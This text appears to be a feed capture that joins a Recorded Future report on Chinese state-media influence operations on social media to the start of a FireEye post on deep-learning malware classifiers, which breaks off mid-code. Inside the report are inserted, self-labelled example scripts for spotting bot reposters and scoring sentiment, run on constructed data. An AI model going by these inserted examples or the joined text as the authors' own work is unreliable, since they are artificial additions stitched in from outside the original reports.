As documented in several research histories of Chinese state control over the internet, including “Censored: Distraction and Diversion Inside China’s Great Firewall” and “Contesting Cyberspace in China: Online Expression and Authoritarian Resilience,” the Chinese state has pioneered internet censorship and social media influence operations since at least the late 1990s.

Internet control and surveillance was initially introduced under the guise of the Golden Shield Project (金盾工程), a massive series of legal and technological initiatives meant to improve intelligence assessments and surveillance capabilities of the national police force. Among the techniques developed at the time was a system for blocking and censoring content known as the “Great Firewall.” The term “Great Firewall” was coined in a June 1997 Wired magazine article in which an anonymous Communist Party official stated that the firewall was “designed to keep Chinese cyberspace free of pollutants of all sorts, by the simple means of requiring ISPs [internet service providers] to block access to ‘problem’ sites abroad.”

Since this time, the techniques of information control have expanded well beyond the simple blocking employed by early iterations of the Great Firewall. The information-control regime in China has evolved to include a dizzying array of techniques, technologies, and resources:

This tool set, combined with the now-ubiquitous mass physical surveillance systems, places China at the forefront of integrating information technology, influence operations, surveillance, and censorship in a model that two scholars from MERICS refer to as “IT-based authoritarianism.”

In addition to the constraints imposed by the Great Firewall and content censorship, the Chinese state also employs a series of active disinformation and distortion measures to influence domestic social media users. One of the most widely studied has been the so-called “50 Cent Party.”

The 50 Cent Party is a group of people hired by the Chinese government to “surreptitiously post large numbers of fabricated social media comments, as if they were the genuine opinions of ordinary Chinese people.” The name derives from a rumor that these fake commentators were paid 50 Chinese cents per comment (this has been largely disproven).

This fabrication of social media comments and sentiment is largely known by the term “astroturfing.” Among scholars of the Chinese domestic social media environment, there is much disagreement regarding what the goals or objectives of government-paid astroturfers are.

One study by professors at Harvard, Stanford, and UC San Diego, published in April 2017, determined that one in every 178 social media posts is fabricated by the government and that comments and campaigns are focused and directed at specific topics or issues. Additionally, these scholars assessed that domestic social media influence operations focus primarily on “cheerleading,” or presenting and furthering a positive narrative about the Chinese state:

Conversely, a separate set of scholars at the University of Michigan, who also examined posts from the 50 Cent Party astroturfers, determined that at least one in every six posts on Chinese domestic social media was fabricated by the government. Further, these scholars argued that less than 40 percent of astroturfed comments could be classified as “cheerleading” and that the rest were a combination of vitriol, racism, insults, and rage against events or individuals. They additionally argue that censors and state-sponsored influence campaigns focus much of their resources on “opinion leaders” and users with large numbers of followers as opposed to simply intervening based on content.

While this debate continues to evolve in the examination of China’s domestic social media environment, to date, nobody has thoroughly examined whether these same techniques are used by the Chinese government in the foreign language space. Given its extensive history and experience in domestic social media influence operations, the question arises of how the Chinese government uses foreign social media to influence the American public.

China’s Strategic Goals

Similarly to the Russian government, the Chinese Communist Party has sought to influence foreign thoughts and opinions of China for decades. In a paper published by the Hoover Institution in November 2018, over 30 of the West’s preeminent China scholars collaborated on disseminating their findings from a working group on China’s influence operations abroad.

That the Chinese government uses state and Party resources to influence how Americans view China is not new. What separates the influence operations of 2019 from those of the past 40 years are two factors: first, the ubiquity and impact of social media, and second, the expanded intent and scope.

First is the proliferation of social media platforms, the increasingly broad range of services offered, and the ability to engage with (and not just broadcast to) the intended audience. Over the course of the past decade, social media platforms have evolved to play an ever-expanding role in the lives of users. In the United States, Americans get their news equally from social media and news sites, spend more than 11 hours per day on average “listening to, watching, reading, or generally interacting with media,” and express varying levels of trust in the reliability of information on social media. Further, social media companies increasingly offer users a wider array of services, pulling more of the average user’s time and attention to their platforms.

Second, the intent and scope of China’s influence operations has evolved. As the Hoover Institution paper identified, President Xi has expanded and accelerated a set of policies and activities that “seek to redefine China’s place in the world as a global player.” At the same time, these activities seek to undermine traditional American values (like the freedoms of press, assembly, and religion) that Chinese leadership increasingly views as threatening to their own system of authoritarian rule.

Former Australian prime minister and China expert Malcolm Turnbull described these expanded and accelerated influence activities as “covert, coercive, or corrupting,” underscoring the transformation in scope and focus of these operations under President Xi.

At the national policy level, China’s goals in conducting influence operations are driven by strategic goals and objectives. First and foremost, China seeks a larger role in and greater influence on the current international system. While scholars disagree on the extent to which China, under Xi Jinping, wishes to reshape the current post-World War II international system, most argue that China does not wish to supplant the United States as the world’s only hegemon; instead, it seeks to exercise greater control and influence over global governance. As summarized in the 2018 U.S. Department of Defense Annual Report to Congress on China:

Greater influence within the international system, regional stability under Chinese conditions, development of a more capable military, and reunification with Taiwan all fall under Xi Jinping’s so-called “Chinese dream of national rejuvenation.” The “Chinese dream” is portrayed by Chinese government and media as unquestionably good and positive for the international community, a message that provides the foundation for foreign influence operations. Advocates of the “Chinese dream” urge that a prosperous and strong China is good for the world and does not pose a threat to any other country, because China will never seek hegemony or territorial expansion.

In his closing speech to the 13th National People’s Congress (NPC) in March 2018, President Xi reinforced China’s commitment to “build a community of shared future for mankind, take responsibility in defending world peace and stability, and make contributions to deliver better lives for all people around the globe.”

Even further, Xi articulated the implications of the “Chinese dream” as unfailingly positive and advantageous for the world at large:

The contrast in the scope and tone of China’s goals in relation to Russia’s strategic goals is a critical point. China’s message to the world is positive, and argues that China’s rise will be beneficial, cooperative, and constructive for the global community. In comparison, Russia’s strategic goals are more combative, revolutionary, and disruptive — all traits that are characteristic of Russian social media influence operations since 2015.

‘Grabbing the Right to Speak’

The media environment in China is nearly completely state-owned, controlled, or subservient to the interests of the state. Almost all national and provincial-level news organizations are state-run and monitored, and the Communist Party’s Propaganda Department issues weekly censorship guidelines. It is not unusual for the top newspapers and websites in China to all publish the same exact headline.


Figure: Images from the front pages of the People’s Daily, the PLA Daily, the Guangming Daily, the Beijing Daily, the Tianjin Daily, and the Chongqing Daily, as identified by Quartz.

This duplication typically occurs around events of strategic importance to the Communist Party and Chinese leadership, such as the annual meetings of the National People’s Congress (NPC) and the 2018 China-Africa Summit.

Further, research has demonstrated that propaganda, the foundation for Chinese state-run foreign influence operations, can still be highly effective, even if it is perceived as overt. This is for the following five reasons:

  1. People are poor judges of true versus false information, and they do not necessarily remember that particular information was false.
  2. Information overload leads people to take shortcuts in determining the trustworthiness of messages.
  3. Familiar themes or messages can be appealing, even if they are false.
  4. Statements are more likely to be accepted if backed by evidence, even if that evidence is false.
  5. Peripheral cues, such as an appearance of objectivity, can increase the credibility of propaganda.

State-run media occupies a specific role in the Party’s efforts to influence foreign opinions of China. The U.S. Department of State described China’s state-run media as the “publicity front” for the Communist Party in its 2017 China Country Report on Human Rights Practices:

Critical to promoting the Party’s will and protecting its authority are two widely distributed and heavily digitized news services: Xinhua and the People’s Daily. Xinhua News Agency is the self-described “official news agency” of China and has been described by Reporters Without Borders as “the world’s biggest propaganda agency.” Although Xinhua attempts to brand itself as another wire news service, it plays a much different role from that of other wire news services (such as Reuters, Associated Press, and so on) and functions completely at the behest and will of the Party. Even further, Xinhua can be seen as an extension of China’s civilian intelligence service, the Ministry of State Security (MSS):

It is not clear the extent to which the MSS guides Xinhua reporting or publishing; however, with the knowledge that overseas correspondents are actually intelligence officers, it is impossible to remove the MSS from a role in Xinhua reporting and messaging overseas.

Xinhua has an extensive English-language site and an active presence on several U.S.-based social media platforms. In January 2018, the New York Times conducted an investigation in which it discovered that Xinhua had purchased social media followers and reposts from a “social marketing” company called Devumi. Our research focused primarily on content propagation and reposts, so we were unable to confirm the findings regarding Xinhua’s followers. However, over the course of our research on top reposters and propagators, we noted that many of the top reposter accounts mimicked the bot setup and techniques used by Devumi. These techniques are easy to replicate, and while we assess that the top 20 Xinhua reposters are either broadcast or spam bots, we were unable to determine the ownership of the accounts.
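The Research Scope section describes the analysis as searching for patterns of automated dissemination, scrutinizing relationships among reposts and top reposting accounts, and examining account naming conventions and hashtags; the paragraph above applies that to the top Xinhua reposters. The following is an added example, not Recorded Future’s tooling or data, of how such a triage can be run over a post export. The posts, the seed account name “wire_news”, the reposter names, the 90 percent “reposts nearly everything” threshold, the coefficient-of-variation cutoff for machine-regular timing, and the generated-name regular expression are all constructed assumptions for illustration.

```python
"""Repost-network and automation triage over a constructed sample of posts.

Added example; not Recorded Future's tooling. Thresholds and the naming
pattern are assumptions chosen for illustration.
"""
import re
import statistics
from collections import Counter
from datetime import datetime

HASHTAG_RE = re.compile(r"#(\w+)")
# Assumed naming convention for auto-generated accounts: a word stem followed
# by a run of four or more digits (e.g. newsfan_20481).
GENERATED_NAME_RE = re.compile(r"^[A-Za-z]+_?\d{4,}$")

# Constructed sample export: (account, timestamp, text, reposted_account).
# "wire_news" is the seed. newsfan_20481 and newsfan_20482 repost every seed
# post after a fixed delay (5 and 7 minutes); ned_news reposts everything but
# at human-irregular times; alice_reads reposts two items irregularly.
SEED_ROWS = [
    ("wire_news", "2018-11-01T08:00:00", "Panda cubs debut at Chengdu base #Panda #China", None),
    ("wire_news", "2018-11-01T12:00:00", "Summit opens in Beijing #BeltAndRoad", None),
    ("wire_news", "2018-11-02T08:00:00", "Autumn colors in Jiuzhaigou #China #Travel", None),
    ("wire_news", "2018-11-02T12:00:00", "Trade talks resume #Trade", None),
]
SAMPLE_POSTS = SEED_ROWS + [
    ("newsfan_20481", "2018-11-01T08:05:00", SEED_ROWS[0][2], "wire_news"),
    ("newsfan_20481", "2018-11-01T12:05:00", SEED_ROWS[1][2], "wire_news"),
    ("newsfan_20481", "2018-11-02T08:05:00", SEED_ROWS[2][2], "wire_news"),
    ("newsfan_20481", "2018-11-02T12:05:00", SEED_ROWS[3][2], "wire_news"),
    ("newsfan_20482", "2018-11-01T08:07:00", SEED_ROWS[0][2], "wire_news"),
    ("newsfan_20482", "2018-11-01T12:07:00", SEED_ROWS[1][2], "wire_news"),
    ("newsfan_20482", "2018-11-02T08:07:00", SEED_ROWS[2][2], "wire_news"),
    ("ned_news", "2018-11-01T10:00:00", SEED_ROWS[0][2], "wire_news"),
    ("ned_news", "2018-11-01T17:00:00", SEED_ROWS[1][2], "wire_news"),
    ("ned_news", "2018-11-02T08:30:00", SEED_ROWS[2][2], "wire_news"),
    ("ned_news", "2018-11-02T21:00:00", SEED_ROWS[3][2], "wire_news"),
    ("alice_reads", "2018-11-01T21:17:00", SEED_ROWS[0][2], "wire_news"),
    ("alice_reads", "2018-11-02T23:41:00", SEED_ROWS[3][2], "wire_news"),
]


def parse_posts(rows):
    """Turn raw export rows into dicts with parsed timestamps."""
    return [{"account": a, "ts": datetime.fromisoformat(t), "text": x, "repost_of": r}
            for a, t, x, r in rows]


def top_reposters(posts, seed, n=5):
    """Accounts that repost the seed most often, as (account, count) pairs."""
    counts = Counter(p["account"] for p in posts if p["repost_of"] == seed)
    return counts.most_common(n)


def repost_delays(posts, seed, account):
    """Seconds between each seed post and the account's repost of it (matched by text)."""
    seed_ts = {p["text"]: p["ts"] for p in posts if p["account"] == seed}
    return [(p["ts"] - seed_ts[p["text"]]).total_seconds()
            for p in posts
            if p["account"] == account and p["repost_of"] == seed and p["text"] in seed_ts]


def is_clockwork(delays, min_posts=3, max_cv=0.1):
    """Machine-regular timing: enough samples and a low coefficient of variation."""
    if len(delays) < min_posts:
        return False
    mean = statistics.mean(delays)
    return mean == 0 or statistics.pstdev(delays) / mean <= max_cv


def hashtag_profile(posts, account):
    """Case-folded hashtag counts for one account, for topic profiling."""
    counts = Counter()
    for p in posts:
        if p["account"] == account:
            counts.update(tag.lower() for tag in HASHTAG_RE.findall(p["text"]))
    return counts


def triage(rows, seed, coverage=0.9):
    """Score the seed's top reposters on three independent automation signals."""
    posts = parse_posts(rows)
    seed_count = sum(1 for p in posts if p["account"] == seed)
    report = {}
    for account, n in top_reposters(posts, seed):
        reasons = []
        if seed_count and n / seed_count >= coverage:     # reposts nearly everything
            reasons.append("reposts_nearly_all")
        if is_clockwork(repost_delays(posts, seed, account)):  # fixed delay after seed
            reasons.append("fixed_delay")
        if GENERATED_NAME_RE.match(account):             # stem + digit suffix
            reasons.append("generated_name")
        # A single signal is weak evidence; require two to flag an account.
        report[account] = {"reposts": n, "reasons": reasons,
                           "likely_automated": len(reasons) >= 2}
    return report


if __name__ == "__main__":
    for account, row in triage(SAMPLE_POSTS, "wire_news").items():
        print(account, row)
    print(hashtag_profile(parse_posts(SAMPLE_POSTS), "wire_news"))
```

Requiring two independent signals matters: ned_news reposts every seed post (a signal Devumi-style accounts also show) but at irregular times and under an ordinary name, so it is not flagged, while the two newsfan_ accounts trip both the fixed-delay and generated-name checks. As the paragraph above notes, none of this establishes who owns an account; it only separates broadcast-bot behaviour from human reposting.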

The People’s Daily is part of a collection of papers and websites that identifies itself as “China’s largest newspaper group.” Similar to Xinhua, the People’s Daily is used by both the MSS and China’s military intelligence department (formerly known as the 2PLA) as cover for sending intelligence agents abroad and presents itself as offering a benign, Chinese perspective on global news. The People’s Daily also operates an English-language news site and operates regularly on several U.S.-based social media platforms.

It is important to note that while the intelligence services have not traditionally held a prominent role in influence operations, they are, as Peter Mattis noted, one of “multiple professional systems operating in parallel” within China to achieve national-level goals and objectives.

The intelligence system, and the MSS in particular, has a role in shaping and influencing Western perceptions of and policies on China, just as the state-run media, United Front Work Department, and propaganda systems all do. While the strategic objectives are determined, prioritized, and disseminated from Xi Jinping down, each system and ministry uses its own tools and resources to achieve those goals. Some of these resources and tools overlap, compete with each other, and even degrade the effectiveness of those leveraged by other ministries and systems.

The sphere of influence operations is no different. Each system has similar and dissimilar tools, but the same objectives.

The Chinese Model of English-Language Social Media Influence Operations

In late 2018 and early 2019, we studied all of the accessible English-language social media posts from accounts run by Xinhua, the People’s Daily, and four other Chinese state-run media organizations geared toward a foreign audience on Western social media platforms. Our research indicates that China has taken a vastly different approach to influencing foreign audiences from its approach in the domestic social media space. While the seed material for the influence campaigns is the same state-run media content, there is likely no English-language equivalent to the 50 Cent Party or army of social media commenters.

Chinese state-run accounts are active social media users. On average, over the date range we studied, state-run accounts posted 60 to 100 times per day across several Western platforms. Xinhua, CGTN, and the Global Times were the most active content generators on these social media platforms, and posts by the People’s Daily, Xinhua, and CGTN were favorited or liked at the highest rates.

Case Study: Instagram

Examining how Xinhua and the People’s Daily utilize Instagram is a good example of how the Chinese state exploits Western social media. Both Xinhua and the People’s Daily have verified accounts on Instagram and are regular users. On average, over this date range, both accounts posted around 26 times per day.


Figure: Instagram page for Xinhua.


Figure: Instagram page for the People’s Daily.

Both accounts have a large number of followers and follow few other accounts. The posts — photographs and videos — are overwhelmingly positive and present any number of variations on a few core themes:

  • China’s vast natural beauty
  • Appealing cultural traditions and heritage
  • Overseas visits by Chinese leaders or visits of foreign leaders to China
  • The positive impact China is having on the world in science, technology, sports, etc.
  • Breaking global news


Figure: Instagram post from the People’s Daily.

In terms of audience engagement, a metric used to assess the impact of social media, these two Chinese accounts are useful to compare to Russian IRA-linked accounts over the past several years, as laid out in the table below.


Figure: Modified table from the University of Oxford’s December 2018 report analyzing audience engagement with IRA-linked Facebook posts.

Over the nearly four months of Instagram data used for this research, Xinhua and the People’s Daily published a combined 6,072 posts, which drew 5,431,009 likes and 17,039 comments. If we assume that these rates held steady over a full year (roughly three such periods), the annual totals for these two accounts would come to roughly 16,293,027 likes and 51,117 comments.

Facebook and Instagram are two different platforms, specializing in communication in two different mediums, but the numbers are still useful for comparing the techniques utilized and the efficacy of state-directed influence operations. Comments are leveraged more widely by users on Facebook, and that platform has two additional means of propagating content (shares and emoji reactions) that Instagram does not.

To compare Instagram usage by both Chinese and Russian state-supported influence campaigns, we used data analysis published in the New Knowledge disinformation report from December 2018. To approximate the Russia numbers for a standard four-month period, we divided the total numbers into segments to get a rough average for comparison. Again, as we do not have access to the actual data used by New Knowledge, this table below is intended to represent a rough comparison to estimate efficacy. Further, we have chosen to profile only two of the most prolific Chinese state-run accounts, and not the entire suite of accounts leveraged for influence operations.

The table below is an estimate of audience engagement from Russian and Chinese state-run influence campaigns on Instagram.

Instagram                                           Russia        China
Average Number of Posts Over a 114-Day Time Frame   20,194        6,072
Number of Likes                                     31,844,639    5,431,009
Average Likes per Post                              1,568         1,360
Comments                                            698,203       17,039
Comments per Post                                   34            3
Total Followers                                     3,391,116     1,084,000
Total Engagements                                   32,542,842    5,448,048

These two Chinese influence profiles reached a level of audience engagement roughly one-sixth as large as the entire Russian IRA-associated campaign targeting the United States on Instagram.

Further, Xinhua also leveraged paid advertisements to promote specific posts during this time frame. The Instagram ad tracker does not allow a user to view all advertisements paid for by a specific account, so the total number of Instagram advertisements used by Chinese influence accounts is unknown at this time. However, the active advertisements we were able to identify followed the core themes identified above and further promoted the image of Xinhua as a wire news service, and not state-run propaganda.

Paid advertisements on Instagram from Xinhua. (Source: Instagram)

Use of Paid Advertisements

Throughout our research time frame, we also observed the use of paid advertisements across multiple platforms. Depending on the platform, paid advertisements are indicated to users via a “sponsored,” “promoted,” or similar notation within the post itself. Each platform uses a unique algorithm to place advertisements within the feeds of its users, based on the individual user’s preferences, likes, dislikes, and more.

Most platforms provide a mechanism for both identifying whether a post is a paid advertisement and allowing a user to research the ads purchased by specific accounts. Advertisements are not searchable ad infinitum, and the length of time a particular platform retains the data accessible to users varies. These limitations constrained our ability to quantify which percentage of posts on social media published by Chinese state-run influence accounts were paid advertisements versus organic posts.

In terms of broad, cross-platform trends, we observed Xinhua, People’s Daily, CGTN, and China Daily running paid advertisements. Consistent with this story from the Digital Forensics Research Lab, we observed overtly political advertisements from Chinese state-run influence accounts across a number of platforms. Many of these paid advertisements were identified and retained by Facebook as part of their archive of “ads related to politics or issues of national importance,” launched on May 7, 2018. For Facebook, advertisements of this kind are required to be authorized and reviewed, but also to carry a specific “paid for by” disclaimer in addition to the notation indicating the post is a paid advertisement.

However, none of the advertisements run by Xinhua or China Daily on Facebook that were retained as part of the “political” archive over our research period were annotated in the Facebook platform as “paid for by” at the time they were run. Therefore, users viewing the posts during the period in which they were active would not have known that the advertisements were deemed overtly “political” or of national importance, or even that they were ultimately purchased by the Chinese state.

Three examples of paid advertisements later identified by Facebook as “political” or of “national importance.”

From our data set, the advertisements that were retained by Facebook as part of its political archive were substantively different from other advertisements purchased during that same time frame and not archived or tagged. The majority of paid advertisements from these state-run accounts appealed to users to like or follow the account for access to global and China-specific news.

Three examples of paid advertisements not identified by Facebook as “political” or of “national importance.”

Paid advertisements across other platforms demonstrated a similar distribution of “political” and general interest posts. However, other platforms did not provide tools to distinguish paid posts that were “political” or of “national interest” from more general posts, or illuminate who ultimately purchased the advertisement.

Sentiment Analysis

As detailed in our section on China’s strategic goals, China seeks to convince the world that its development and rise is unfailingly positive, beneficial, cooperative, and constructive for the global community. While sentiment analysis can be inexact and has a mixed track record, it is most useful on large data sets like this one. We used the VADER sentiment analysis technique and the code from its GitHub repository. Typical scoring thresholds used in sentiment analysis are:

  • Positive: Greater than 0.05
  • Neutral: From -0.05 to 0.05
  • Negative: Less than -0.05
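As an added illustration (not the report’s code, and not the VADER project’s lexicon), the block below applies VADER’s compound normalisation and the thresholds above to a handful of constructed posts, using a tiny hand-built lexicon so that it runs offline; every word rating in it is an assumption of this example.

```python
import math
import re

# Added example, not the report's code or the VADER project's lexicon: a small
# VADER-style scorer that applies the compound normalisation and the thresholds
# above to constructed posts. The real VADER lexicon has ~7,500 rated entries plus
# booster, negation and punctuation rules; this constructed lexicon is tiny so the
# block runs offline, and every rating in it is an assumption of this example.
LEXICON = {
    "beautiful": 2.9, "amazing": 2.8, "heartwarming": 2.5, "cooperative": 1.6,
    "beneficial": 1.9, "celebrate": 2.1, "win": 2.8,
    "unstable": -1.7, "erratic": -1.3, "volatile": -1.2, "crisis": -2.3,
}
BOOSTERS = {"very": 0.293, "extremely": 0.293}   # VADER's booster increment
NEGATIONS = {"not", "never", "no"}
NEGATION_SCALAR = -0.74                            # VADER flips and damps a negated word
ALPHA = 15                                         # VADER's normalisation constant


def tokenize(text):
    return re.findall(r"[a-z']+", text.lower())


def compound_score(text):
    """Sum the valence of rated words (with booster/negation on the preceding
    word), then squash into [-1, 1] as VADER does: x / sqrt(x^2 + alpha)."""
    tokens = tokenize(text)
    total = 0.0
    for i, tok in enumerate(tokens):
        valence = LEXICON.get(tok)
        if valence is None:
            continue
        prev = tokens[i - 1] if i > 0 else ""
        if prev in BOOSTERS:
            valence += BOOSTERS[prev] if valence > 0 else -BOOSTERS[prev]
        elif prev in NEGATIONS:
            valence *= NEGATION_SCALAR
        total += valence
    return total / math.sqrt(total * total + ALPHA)


def label(score):
    """The thresholds listed above."""
    if score > 0.05:
        return "positive"
    if score < -0.05:
        return "negative"
    return "neutral"


# Constructed posts (not quotes from any account), tagged with the month they
# would have fallen in during the research window.
POSTS = [
    ("October", "Stunning autumn colors in Beijing's beautiful parks #AmazingChina"),
    ("October", "CIIE opens in Shanghai as a beneficial, cooperative platform for trade"),
    ("November", "Xi Jinping arrives in Buenos Aires for the G20 summit #Xiplomacy"),
    ("November", "Markets slide as the trade war crisis deepens"),
]


def monthly_sentiment(posts):
    """Mean compound score per month, labelled with the thresholds above."""
    sums, counts = {}, {}
    for month, text in posts:
        sums[month] = sums.get(month, 0.0) + compound_score(text)
        counts[month] = counts.get(month, 0) + 1
    return {m: (round(sums[m] / counts[m], 3), label(sums[m] / counts[m])) for m in sums}


if __name__ == "__main__":
    for month, (score, tag) in monthly_sentiment(POSTS).items():
        print(f"{month:9} {score:+.3f} {tag}")
```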

Sentiment score of Chinese influence accounts posts from October 2018 through January 2019.

On average, Chinese state-run influence accounts projected positive sentiment to platform users, which is consistent with the strategic goal of portraying China’s development and rise as positive and beneficial for the global community.

Social Media Messages

We also analyzed the content and hashtags associated with state-run influence accounts. Again, across social media platforms, the content and messages propagated were overwhelmingly positive. Top hashtags and specific content varied by account, month, and media outlet; however, hashtags for Chinese senior leaders (such as Xi Jinping and Li Keqiang) remained among the most popular for all accounts over the entire research duration. This included hashtags for official travel and state visits (such as #Xiplomacy and #XiVisit).

Additionally, each month, a particular event was highlighted universally across the social media accounts we analyzed.

Month      Event
October    CIIE, China International Import Expo in Shanghai
November   G20, Group of 20 2018 Summit in Argentina
December   40th Anniversary of China’s Reform and Opening Up
January    Chinese Spring Festival

Each account typically presented its own “take” or message depending on the specialization of the media outlet. For example, the People’s Daily propagated a greater percentage of apolitical, human interest, positive China stories (using hashtags such as #heartwarmingmoments and #AmazingChina) than other outlets, while Xinhua propagated a higher percentage of breaking news stories.

While the messages that these accounts propagated align strategically with China’s articulated goals, they also demonstrated a responsiveness to international events. The clearest case was the December 2018 arrest of Huawei Chief Financial Officer Meng Wanzhou in Canada. For the prior two months, Huawei was mentioned minimally in social media posts — only by the Global Times and China Plus News. Beginning in December, Huawei became a top topic of influence messaging for all accounts, a trend which continued to the end of the study’s time frame.

This alignment of highlighted events and topics is likely a result of the regular rules issued by state propaganda authorities each week to both domestic and foreign outlets.

2018 US Midterm Elections

We assess that these Chinese state-run influence accounts did not attempt a large-scale campaign to influence American voters in the run-up to the November 6, 2018 midterm elections. However, on a small scale, we observed engagement by all of the state-run influence accounts in disseminating breaking news and biased content surrounding President Trump and China-related issues.

The most active account, in terms of opinionated or biased election-related content, was the Global Times, which has long had a reputation for “aggressive editorials” that “excoriat[e] any country or foreign politician whom China has an issue with.” On November 6, the Global Times propagated an article that referred to President Trump as “unstable” and his policies as “volatile and erratic.” The article closed with a refrain that has become familiar across Chinese state-run media since the advent of the trade war:

Based on our research, what made this Chinese-propagated content different from Russian election influence attempts was threefold:

  1. The scale of this content and its dissemination was very limited. Most of these posts were not widely reposted, favorited, or liked, and the actual impact was likely minimal on American voters.
  2. Chinese content largely did not express a preference for one candidate or party over another. Aside from the comments about President Trump, which have been widely disseminated in Chinese media since 2017, the articles expressed concern or perspectives in relation to issues that China was concerned with, such as the trade war.
  3. The propagated elections-related content was primarily generated by the Global Times and Xinhua. Using state-run media as seed data is in contrast to the Russian technique during the 2018 midterms of disseminating hyperpartisan perspectives on legitimate news stories from domestic American news sites.


Our research demonstrates that social media influence campaigns are not a one-size-fits-all technique. The Russian state has used a broadly negative, combative, destabilizing, and discordant influence operation because that type of campaign supports Russia’s strategic goals to undermine faith in democratic processes, support pro-Russian policies or preferred outcomes, and sow division within Western societies. Russia’s strategic goals require covert actions and are inherently disruptive, therefore, the social media influence techniques employed are secretive and disruptive as well.

The Chinese state has a starkly different set of strategic goals, and as a result, Chinese state-run social media influence operations use different techniques. Xi Jinping has chosen to support China’s goal to exert greater influence on the current international system by portraying the government in a positive light, arguing that China’s rise will be beneficial, cooperative, and constructive for the global community. This goal requires a coordinated global message and technique, which presents a strong, confident, and optimistic China.

Our research has revealed that the manner in which China has attempted to influence the American population is different from the techniques it uses domestically. While researchers have demonstrated that China does want to present a positive image of the state and Communist Party domestically, the techniques of censorship, filtering, astroturfing, and comment flooding are not viable abroad. We discovered no English language equivalent to the 50 Cent Party in Western social media. This does not mean that China’s policies, messages, propaganda, and media have no defenders on social media.

Instead, we believe that the Chinese state has employed a plethora of state-run media to exploit the openness of American democratic society and insert an intentionally distorted and biased narrative “for hostile political purposes.” As expertly explained in the Hoover Institution paper, these influence operations are not benign in nature, but support China’s goals to “redefine its place in the world as a global player” by “exploiting America’s openness in order to advance its aims on a competitive playing field that is hardly level.” China uses the openness of American society to propagate a distorted and utopian view of its government and party.

Over the long term, scholars believe that current Chinese leadership actually view core American values and freedoms, such as those of press, assembly, and religion, as “direct challenges to its own form of one-party rule.” It is therefore imperative that we not be complacent when confronting Chinese information manipulation on social media. Identifying the goals and techniques of these influence operations is the first step toward countering their deleterious effects.

At this point, it is valuable to revisit why influence operations and propaganda can be so persuasive, and to use this research to counter those arguments. Again, according to research from RAND, propaganda (and resulting influence campaigns) are effective for the following five reasons:

  1. People are poor judges of true versus false information, and they do not necessarily remember that particular information was false.
  2. Information overload leads people to take shortcuts in determining the trustworthiness of messages.
  3. Familiar themes or messages can be appealing, even if they are false.
  4. Statements are more likely to be accepted if backed by evidence, even if that evidence is false.
  5. Peripheral cues, such as an appearance of objectivity, can increase the credibility of propaganda.

For those who use social media, knowledge is the greatest tool in combating influence operations. Social media users bear a greater responsibility to themselves and the American public to develop better means of detecting and dismissing influence attempts. Corporate, public, and private users should use both this research and other research on state-run influence operations to refine those means and tools to counter the exploitation of our open society and values by foreign governments.

The post Beyond Hybrid War: How China Exploits Social Media to Sway American Opinion appeared first on Recorded Future.


What are Deep Neural Networks Learning About Malware?

An increasing number of modern antivirus solutions rely on machine learning (ML) techniques to protect users from malware. While ML-based approaches, like FireEye Endpoint Security’s MalwareGuard capability, have done a great job at detecting new threats, they also come with substantial development costs. Creating and curating a large set of useful features takes significant amounts of time and expertise from malware analysts and data scientists (note that in this context a feature refers to a property or characteristic of the executable that can be used to distinguish between goodware and malware). In recent years, however, deep learning approaches have shown impressive results in automatically learning feature representations for complex problem domains, like images, speech, and text. Can we take advantage of these advances in deep learning to automatically learn how to detect malware without costly feature engineering?

As it turns out, deep learning architectures, and in particular convolutional neural networks (CNNs), can do a good job of detecting malware simply by looking at the raw bytes of Windows Portable Executable (PE) files. Over the last two years, FireEye has been experimenting with deep learning architectures for malware classification, as well as methods to evade them. Our experiments have demonstrated surprising levels of accuracy that are competitive with traditional ML-based solutions, while avoiding the costs of manual feature engineering. Since the initial presentation of our findings, other researchers have published similarly impressive results, with accuracy upwards of 96%.

Since these deep learning models are only looking at the raw bytes without any additional structural, semantic, or syntactic context, how can they possibly be learning what separates goodware from malware? In this blog post, we answer this question by analyzing FireEye’s deep learning-based malware classifier.


  • FireEye’s deep learning classifier can successfully identify malware using only the unstructured bytes of the Windows PE file.
  • Import-based features, like names and function call fingerprints, play a significant role in the features learned across all levels of the classifier.
  • Unlike other deep learning application areas, where low-level features tend to generally capture properties across all classes, many of our low-level features focused on very specific sequences primarily found in malware.
  • End-to-end analysis of the classifier identified important features that closely mirror those created through manual feature engineering, which demonstrates the importance of classifier depth in capturing meaningful features.


Before we dive into our analysis, let’s first discuss what a CNN classifier is doing with Windows PE file bytes. Figure 1 shows the high-level operations performed by the classifier while “learning” from the raw executable data. We start with the raw byte representation of the executable, absent any structure that might exist (1). This raw byte sequence is embedded into a high-dimensional space where each byte is replaced with an n-dimensional vector of values (2). This embedding step allows the CNN to learn relationships among the discrete bytes by moving them within the n-dimensional embedding space. For example, if the bytes 0xe0 and 0xe2 are used interchangeably, then the CNN can move those two bytes closer together in the embedding space so that the cost of replacing one with the other is small. Next, we perform convolutions over the embedded byte sequence (3). As we do this across our entire training set, our convolutional filters begin to learn the characteristics of certain sequences that differentiate goodware from malware (4). In simpler terms, we slide a fixed-length window across the embedded byte sequence and the convolutional filters learn the important features from across those windows. Once we have scanned the entire sequence, we can then pool the convolutional activations to select the best features from each section of the sequence (i.e., those that maximally activated the filters) to pass along to the next level (5). In practice, the convolution and pooling operations are used repeatedly in a hierarchical fashion to aggregate many low-level features into a smaller number of high-level features that are more useful for classification. Finally, we use the aggregated features from our pooling as input to a fully-connected neural network, which classifies the PE file sample as either goodware or malware (6).

Figure 1: High-level overview of a convolutional neural network applied to raw bytes from Windows PE files.

The specific deep learning architecture that we analyze here actually has five convolutional and max pooling layers arranged in a hierarchical fashion, which allows it to learn complex features by combining those discovered at lower levels of the hierarchy. To efficiently train such a deep neural network, we must restrict our input sequences to a fixed length – truncating any bytes beyond this length or using special padding symbols to fill out smaller files. For this analysis, we chose an input length of 100KB, though we have experimented with lengths upwards of 1MB. We trained our CNN model on more than 15 million Windows PE files, 80% of which were goodware and the remainder malware. When evaluated against a test set of nearly 9 million PE files observed in the wild from June to August 2018, the classifier achieves an accuracy of 95.1% and an F1 score of 0.96, which are on the higher end of scores reported by previous work.
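To make steps (1) through (5) concrete, here is an added toy forward pass in pure Python; it is not FireEye’s model or code. The dimensions are shrunk, the weights are constructed rather than trained, and the filter is a hand-built matched filter for a push-push-call opcode prefix, so that the pooled activation traces back to a known file offset; the assumption that the padding symbol and 0x00 embed to the zero vector belongs to this toy, not to the real classifier.

```python
import random

# Added example, not FireEye's model: a toy version of steps (1)-(5) with
# constructed weights. The model in the post uses a 100KB input and 96 filters
# in its first layer; everything here is shrunk so it runs in a few milliseconds.
PAD = 256        # special padding symbol, outside the 0x00-0xFF byte alphabet
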